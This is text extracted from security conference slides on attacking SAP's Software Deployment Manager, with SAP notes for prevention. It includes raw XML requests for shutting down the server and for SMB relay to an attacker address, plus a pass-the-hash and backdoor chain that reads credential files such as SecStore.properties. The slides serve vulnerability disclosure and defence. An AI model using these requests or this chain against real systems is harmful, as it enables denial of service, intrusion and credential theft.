sap sdm hacking

Invest in security to secure investments

Injec&ng evil code in your SAP J2EE systems: Security of SAP So<ware Deployment Server

Dmitry Chastukhin Director of SAP pentest/research team

About ERPScan

•  The only 360-‐degree SAP Security solu8on -‐ ERPScan Security Monitoring Suite for SAP

•  Leader by the number of acknowledgements from SAP ( 150+ ) •  60+ presenta&ons key security conferences worldwide •  25 Awards and nomina&ons •  Research team -‐ 20 experts with experience in different areas

of security •  Headquarters in Palo Alto (US) and Amsterdam (EU)

2

SAP popularity

•  The most popular business applica8on •  More than 248,500 customers in 188 countries •  More than 70% of Forbes 500 run SAP

3

SAP insecurity

Espionage •  Stealing financial informa8on •  Stealing corporate secrets •  Stealing supplier and customer lists •  Stealing HR data

Fraud •  False transac8ons •  Modifica8on of master data

Sabotage •  Denial of service •  Modifica8on of financial reports •  Access to technology network (SCADA) by trust rela8ons

4

0

5

10

15

20

25

30

35

2003 2004 2005 2006 2007 2008 2009 2010 2011 2012 2013

SAP hacking talks

•  BlackHat •  Defcon •  HITB •  RSA •  CONFidence •  DeepSec •  Hack8vity •  Troopers •  Source

Source: SAP Security in Figures

5

More than 2700 in total


6

SAP vulnerabili&es

Is it remotely exploitable?

> 5000 non-‐web SAP services exposed in the world including Dispatcher, Message Server, Sap Host Control, etc.

sapscan.com

7

What about other services?

0

1

2

3

4

5

6

7

8

9

SAP Dispatcher SAP MMC SAP Message Server SAP HostControl SAP ITS Agate SAP Message Server httpd


8

•  Design Time Repository (DTR) •  Component Build Service (CBS) •  Change Management Service (CMS) •  So[ware Landscape Directory (SLD) / NS •  So[ware Deployment Manager (SDM)

9

SAP NetWeaver development infrastructure

10


11


12


13


14


15


So<ware Deployment Manager

•  Single interface for the deployment •  Deploy apps (*.ear, *.war, *.sda) •  Implement custom patches

16

SDM server

•  Different server modes –  standalone –  integrated

•  Only one user at 8me •  Only hardcoded admin user •  Two ports:

–  50117 – Admin Port –  50118 – GUI Port

17

SDM client

•  Browsing the distribu8on of deployed components •  Deploying and undeploying •  Log viewing

18

SDM a^ack intro

•  SAP infrastructure includes many Java services •  Almost all Java stuff uses UME •  Universal user with a password •  Only one user at a 8me •  Ability to deploy evil code => plus, see 1st item

19

SDM a^ack intro

•  Thick client Java applica8on (sad story) •  Scarce communica8ons segngs •  Difficult to intercept •  Custom protocols

20

SDM a^ack intro

•  SAP has its own SAP Java Virtual Machine (JVM) •  Java 6 has Ajach API •  Ajach to another running JVM •  Intercept and modify calls

21

A^ack SAP SDM. DoS

•  If ajacker uses an incorrect password 3 8mes, the server will shutdown automa8cally

•  Also, if you send this request, you can shutdown the SDM server manually:

[10 spaces]56<?xml version="1.0"?> <ShutDownRequest></ShutDownRequest>

22

A^acking SAP SDM. SMB relay

Packed:

[10 Spaces]<?xml version="1.0"?> <FileAccessRequest f="\\ip_addr\blabla"> </FileAccessRequest>

An old trick, but some8mes it’s very useful

23

Preven&on

•  Install note 1724516 •  Enable the security features of SDM •  SDM server and SDM client need to be updated

hjps://websmp205.sap-‐ag.de/~sapidb/012006153200000493902012E/SDM_EnablingSecurity.pdf

24

From Nobody to Administrator

Now, I will show an interes0ng a2ack

Compromise Some SAP Services

Compromise SAP SDM

Compromise SAP Server OS

Compromise SAP

25

SDM authen&ca&on abuse

•  OK. Let’s see how authen8ca8on in SDM works: –  user enters password –  hash is calculated locally on client –  password hash is sent to server –  hash is compared to hash from config file

•  Looks like a plain text password

Pass the hash a^ack here!

26


RootFrame.class

27


…\SDM\program\config\sdmrepository.sdc

28


SMDAuthen8catorImpl.class

29

A^ack on SAP SDM

Read sdmrepository.sdc

Get hash password

Use hash as password to authen8cate on SDM server

Deploy backdoor on SAP Server

PROFIT!

30

File read

•  OS command execu8on through CTC (Notes 1467771, 1445998 ) •  XML External En88es (Note 1619539) •  Directory Traversal (Note 1630293 ) •  Through MMC file read func8on (Notes 927637 and 1439348)

We have something new for u J

31

SAP Log Viewer standalone

•  Open ports: 26000 (NI), 1099 (RMI), 5465 (Socket) •  You can:

–  View log on local server –  View log on remote server –  Register file as log file

Read log file without authen&ca&on!

32


A^ack is pre^y easy

Connect to LogViewer standalone Server

Register sdmrepository.sdc file as log file

Read it

33


34


When we have a password hash, we can use it as password to authen8cate on SDM server

35

SDM intrusion

Full info about the SDM repository

36

Bypassing SDM restric&ons

•  Observe all server directories •  Read arbitrary files via Log Viewer

37

SDM undeploying

Undeploy any applica8on

38

SDM backdooring

Deploy any applica8on

39

SDM backdooring

•  before

•  a[er

40

SDM post-‐exploita&on

41

Preven&on

•  Install Note 1724516, 1685106 •  Enable the security features of SDM •  SDM server and SDM client need to be updated

hjps://websmp205.sap-‐ag.de/~sapidb/012006153200000493902012E/SDM_EnablingSecurity.pdf

42

“The So=ware Deployment Manager (SDM) uses the database connec0on informa0on, the J2EE Engine administrator user and password from the secure storage in the file system, to connect to the J2EE Engine and perform tasks such as so=ware deployment and undeployment”.

hjp://help.sap.com/saphelp_nw70ehp1/helpdata/en/3d/2e104202795e33e10000000a155106/content.htm

Wow! J2EE Engine administrator user and password

Where is all this stuff located?

SAP SecStore

43

SAP SecStore

“By default, the J2EE Engine stores secure data in the file \usr\sap\<SID>\SYS\global\security\data\SecStore.proper0es in the file system”.

“The J2EE Engine uses the SAP Java Cryptography Toolkit to encrypt the contents of the secure store with the tripleDES algorithm”.

hjp://help.sap.com/saphelp_nw70ehp1/helpdata/en/3d/2e104202795e33e10000000a155106/content.htm

OK. Let’s try to read SecStore.proper0es

44

SAP SecStore

•  We can execute any OS command (we have our backdoor) •  We know the SAP J2EE Engine stores the database

user SAP<SID>DB; its password is here:

\usr\sap\<SID>\SYS\global\security\data\SecStore.properties

•  It’s all that we need

45

$internal/version=Ni4zFF4wMSeaseforCCMxegAfx admin/host/TTT=7KJuOPPs/+u+14jM7uy7cy7exrZuYvevkSrPxwueur2445yxgBS

admin/password/TTT=7KJuOPPs/+uv+14j56vDc7M7v7dytbGbkgqDp+QD04b0Fh

jdbc/pool/TTT=7KJuOPPs/+u5jM6s1cvvgQ1gzFvarxuUzEJTHTJI0VGegH

admin/port/TTT=7KJuOPPs/+u+1j4vD1cv6ZTvd336rzEd7267Rwr4ZUgRTQ

$internal/check=BJRrzfjeUA+bw4XCzdz16zX78ufbt

$internal/mode=encrypted

admin/user/TTT=7KJuOPPs/+u+14j6s14sTxXU3ONl3rL6N7yssV75eC6/5S3E

SecStore.proper&es

But where is the key?

46

Get the password

•  We have an encrypted password •  We have a key to decrypt it

We got the J2EE admin and JDBC login:password!

47

Preven&on

Restrict read access to files SecStore.proper0es and SecStore.key hjp://help.sap.com/saphelp_nw73ehp1/helpdata/en/cd/14c93ec2f7df6ae10000000a114084/content.htm

48

Post-‐exploita&on

49

SDM hacking demo

50

It is possible to protect yourself from these kinds of issues, and we are working close with SAP to keep customers secure

SAP Guides

It’s all in your hands

Regular security assessments

ABAP code review

Monitoring technical security

Segrega&on of Du&es

Security events monitoring

51

Conclusion

I'd like to thank SAP's Product Security Response Team for the great coopera0on to make SAP systems more secure. Research is always ongoing, and we can't share all of it today. If you want to be the first to see new a2acks and demos, follow us at @erpscan and a2end future presenta0ons:

•  October 30-‐31 RSA Europe (Amsterdam, NL) •  November 7-‐8 ZeroNights (Moscow, Russia) •  November 10 G0S (New Dehli, India)

52

Future work

Web: www.erpscan.com e-‐mail: [email protected] Twijer: @erpscan @_chipik

53

sap sdm hacking

Software